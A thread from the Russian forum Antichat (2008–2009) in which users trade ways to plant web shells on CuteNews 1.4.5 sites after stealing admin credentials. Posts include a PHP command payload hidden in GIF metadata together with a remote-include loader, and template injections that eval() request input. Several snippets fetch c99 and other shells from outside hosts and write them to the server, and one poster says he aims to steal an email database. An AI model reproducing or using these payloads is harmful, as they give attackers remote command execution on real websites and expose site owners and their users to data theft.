Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   CuteNews 1.4.5 help (https://forum.antichat.xyz/showthread.php?t=66102)

6u4yxa 01.04.2008 02:13
CuteNews 1.4.5 help
 
Здраствуйте товарисчи !
С толкнулся с такой проблемой. Пробежавшись по сайтам нашел сплойт на 1,4,5 выдернул акк и пароль на админку, проверил - входит.
Опять полез по просторам искать возможность залить шел на сервак- в итоге попал сюда =) ибо не че путного не нашел.
Хотел спросить знающих, какие способы есть заливки шела имея админа в 1,4,5 ? (Желательно если такое возможно с пояснениями)
И сразу же не отходя ещё вопрос по шелу- есть шел с функциями удаления файлов на удаленной машине, открытие cmd?

З.Ы. Убедительная просьба не отправлять на поиск т.к. там все не то что надо, либо для cutenews расписано в 2 строчки что приводик к замешательству...

blackybr 01.04.2008 22:15
Там можно залить картинку в виде 123.jpg.php а также евалить код в шаблонах. как сделать второе - догадайся сам.

6u4yxa 02.04.2008 02:28
Про 1:
а можно поподробней про 123.jpg.php . (попробовал залить через админку пишет такой тип файлов не поддерживается)

2:
Я пробывал вставлять на прямую пхп код, но он не выводит его... тоесть вообще не воспринимает.
а по поводу евалить ? - оно ?
<?php eval(GET['путь до шела/shell.php']) ?> - тоесть с помощью этой строчки загрузиться мой шелл ?

6u4yxa 02.04.2008 11:43
нашел на секьюритилаб
Цитата:
Необходимый уровень доступа: => 3 (journalist)
# SHELL #

[1] Открываем фотошоп, создаем картинку 60х60. Идем в File -> File Info и пишем в поле копирайтов: Код <?php passthru($_GET['cmd']); include($_GET['sh']); ?> Сохраняем картинку с именем image.gif

[2] Постим новость. Вводим все необходимые поля и жмем на ссылку [insert image]. Жмем на кнопку Обзор и выбираем наш image.gif. Жмем на upload. Если все прошло успешно, видим сообщение: "image.jpg -> Image was uploaded". Жмем на ссылку [insert it]. Жмем Add News. Наш image.gif расположен здесь: http://host/[news]/data/upimages/image.gif

[3] Получаем шелл. Регистрируем домен на хостинге с поддержкой PHP и allow_url_fopen = on (у нас будет http://host.ru). создаем файл (допустим inc.php) со следующим содержанием:
PHP код:
<?php include($_GET['shell']); ?>
Теперь запускаем его так: http://host.ru/inc.php?shell=http://host/[news]/data/upimages/image.gif&cmd=ls -la

или так:

http://host.ru/inc.php?shell=http://host/[news]/data/upimages/image.gif&sh=http://shell
Прошелся 100 раз по всем трем пунктам =) результата 0 =) хостер (в локалке сервак) выдает:

Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\appserv\htdocs\inc.php on line 1

Warning: include(http://ip(там где картинка)/cute/data/upimages/image.gif) [function.include]: failed to open stream: no suitable wrapper could be found in C:\appserv\htdocs\inc.php on line 1

Warning: include() [function.include]: Failed opening 'http://ip(там где картинка)/cute/data/upimages/image.gif' for inclusion (include_path='.;C:\appserv\php\pear\') in C:\appserv\htdocs\inc.php on line 1

З.Ы. в пхп.ини include = on fopen = on

zythar 02.04.2008 11:53
Цитата:
URL file-access is disabled in the server configuration
попроси админа сделать URL file-access enabled. то что include=on и fopen=on не имеет значения. тебе сказано в чем проблема

+toxa+ 02.04.2008 12:51
пробуй eval'ить код
PHP код:
$data=@implode('',file('http://toxa.nov.ru/z.txt'));
$fp=@fopen('./sh.php','wb');@fputs($fp,$data);@fclose($fp); 
или просто форму для загрузки сделай и через неё грузи шелл

6u4yxa 02.04.2008 13:08
Цитата:
Сообщение от zythar
попроси админа сделать URL file-access enabled. то что include=on и fopen=on не имеет значения. тебе сказано в чем проблема
C URL file-access enabled - меня побрили без указания причин =)
Есть какие нить варианты, как залить шелл имея админку в cutenews ?

6u4yxa 02.04.2008 13:18
Цитата:
Сообщение от +toxa+
пробуй eval'ить код
PHP код:
$data=@implode('',file('http://toxa.nov.ru/z.txt'));
$fp=@fopen('./sh.php','wb');@fputs($fp,$data);@fclose($fp); 
или просто форму для загрузки сделай и через неё грузи шелл
Когда через админку вставляю в темплейты любой пхп код, то он не как не всопринимается.

baltazar 29.05.2008 14:46
с картинками там проблема,вот взял и передал сплоит что на милворме,вот что получилось
Код:
$allowed_extensions = array("gif", "jpg", "png", "bmp", "jpe", "jpeg");

[...]

for ($image_i = 1; $image_i < ($images_number+1); $image_i++) {
    $current_image = 'image_'.$image_i;

    $image = $_FILES[$current_image]['tmp_name'];
    $image_name = $_FILES[$current_image]['name'];
    $image_name = str_replace(" ", "_", $image_name);

    $img_name_arr = explode(".",$image_name);
    $type = end($img_name_arr);


    if($image_name == ""){ $img_result .= "<br><font color=red>$current_image -> No File Specified For Upload!</font>"; }
    elseif( !isset($overwrite) and file_exists($config_path_image_upload."/".$image_name)){ $img_result .= "<br><font color=red>$image_name -> Image already exist!</font>";}
    elseif( !(in_array($type, $allowed_extensions) or in_array(strtolower($type), $allowed_extensions)) ){
              $img_result .= "<br><font color=red>$image_name ->This type of file is not allowed !!!</font>";
    }
    else{  //Image is OK, upload it

ac1D 25.07.2008 15:40
а если у меня в разделе статистика, в аттопроверке системы все поставлено на NO, точ то с этим можно сделать...?
а при попытке залить картинку, пишет
Цитата:
Проверьте, есть ли такой тип файлов в php.ini вашего сервера

AseRTin 12.08.2008 08:24
тему АП ;)
Цитата:
Сообщение от baltazar
с картинками там проблема,вот взял и передал сплоит что на милворме,вот что получилось
Код:
$allowed_extensions = array("gif", "jpg", "png", "bmp", "jpe", "jpeg");

[...]

for ($image_i = 1; $image_i < ($images_number+1); $image_i++) {
    $current_image = 'image_'.$image_i;

    $image = $_FILES[$current_image]['tmp_name'];
    $image_name = $_FILES[$current_image]['name'];
    $image_name = str_replace(" ", "_", $image_name);

    $img_name_arr = explode(".",$image_name);
    $type = end($img_name_arr);


    if($image_name == ""){ $img_result .= "<br><font color=red>$current_image -> No File Specified For Upload!</font>"; }
    elseif( !isset($overwrite) and file_exists($config_path_image_upload."/".$image_name)){ $img_result .= "<br><font color=red>$image_name -> Image already exist!</font>";}
    elseif( !(in_array($type, $allowed_extensions) or in_array(strtolower($type), $allowed_extensions)) ){
              $img_result .= "<br><font color=red>$image_name ->This type of file is not allowed !!!</font>";
    }
    else{  //Image is OK, upload it

хм... спойт как я понимаю этот: http://milw0rm.com/exploits/4779
куда ты там свою переделку запихал???

p.s. в наличии 4 сайта с такойже проблемой.... хочется стянуть базу мыл...

antarius 14.08.2008 20:48
да такая же проблема шелл не залит в 1.4.5 думаем как картинками не идёт тупо орткрывается страница шелла и написано изображения хз чё думать подскажите чё)

DJ ][akep 09.11.2008 12:31
Вобщем допись

PHP код:
HTML;
$data=implode('',file('http://сай_дошела.ru/shell.php')); 
$fp=fopen('./sh.php','wb');
fputs($fp,$data);
fclose($fp); 
Создает в папке news как видите файл sh.php, это и есть ваш шел :)
Работает 100% проверял на многих...
Удачи.


P.S. Только незабудьте удалить абсолютно все пробелы ;)

NamahS 13.11.2008 10:47
Цитата:
Сообщение от DJ ][akep
P.S. Только незабудьте удалить абсолютно все пробелы ;)
Постить сюда второй разне буду....
Может поможешь?
Как раз проблема с пробелами(((((
https://forum.antichat.ru/showthread...013#post941013

DanST 19.08.2009 13:08
Дайте мне сам сплойт =)

InFlame 19.08.2009 13:38
Цитата:
Сообщение от DanST
Дайте мне сам сплойт =)
Поиск для кого придуман?

DanST 19.08.2009 14:03
хз
а милворм не пашет

korp 19.08.2009 15:30
Если ресурс малопосещяем то просто в шаблоны всунь код шела или форму загрузки и с помощью её залей шелл.

SEWERN 20.08.2009 15:56
элементарно залить шелл))) заходиш в редактирование шаблонов , редактируеш шаблон новостей , заменяеш заблон на

HTML;
$file = file_get_contents('http://suchechka.freehostia.com/c99.txt');
$brd = fopen('shell99.php','w+');
$write = fwrite($brd, $file);

ждеш мин 3) и шелл залит в корень cutenews ( /news/shell99.php ) и в корень сайта http://www.xxx.ru/shell99.php

Calypso 27.08.2009 11:24
Цитата:
Сообщение от SEWERN
элементарно залить шелл))) заходиш в редактирование шаблонов , редактируеш шаблон новостей , заменяеш заблон на

HTML;
$file = file_get_contents('http://suchechka.freehostia.com/c99.txt');
$brd = fopen('shell99.php','w+');
$write = fwrite($brd, $file);

ждеш мин 3) и шелл залит в корень cutenews ( /news/shell99.php ) и в корень сайта http://www.xxx.ru/shell99.php
вот что получается Warning: file_get_contents(http://suchechka.freehostia.com/c99.txt) [function.file-get-contents]: failed to open stream: Permission denied in /usr/home/hosting/esport/ogel2008/admin/data/Default.tpl on line 5

Pashkela 27.08.2009 11:40
failed to open stream - чо тут непонятного? вставь просто eval($_GET[e]); и лей шелл спокойно. Нет, надо сразу удаленно копировать или инклудить обязательно

spamerr 24.09.2009 20:04
Цитата:
Сообщение от Pashkela
failed to open stream - чо тут непонятного? вставь просто eval($_GET[e]); и лей шелл спокойно. Нет, надо сразу удаленно копировать или инклудить обязательно
можеш описать поподробнее данную операцию,а то все способа не работают

warlok 24.09.2009 20:11
Цитата:
можеш описать поподробнее данную операцию,а то все способа не работают
прочитай сначала внимательней справку по nix консоли, и выполняй через функцию system в пхп.

spamerr 24.09.2009 22:11
Вот установил в темплейт
HTML;
if(isset($_GET['shell'])) eval($_GET['shell']);

Работает команда phpinfo();

Как можно залить полноценний шелл???

P.S.Пробовал залить файл через форму загрузки файла,но вылетает ошибка что доступ закрыт

warlok 27.09.2009 17:46
spamerr например:
Код:
script.php?shell=system(GET http://google.ru/index.php > shell.php);
прочитай ман про качалки


Время: 05:52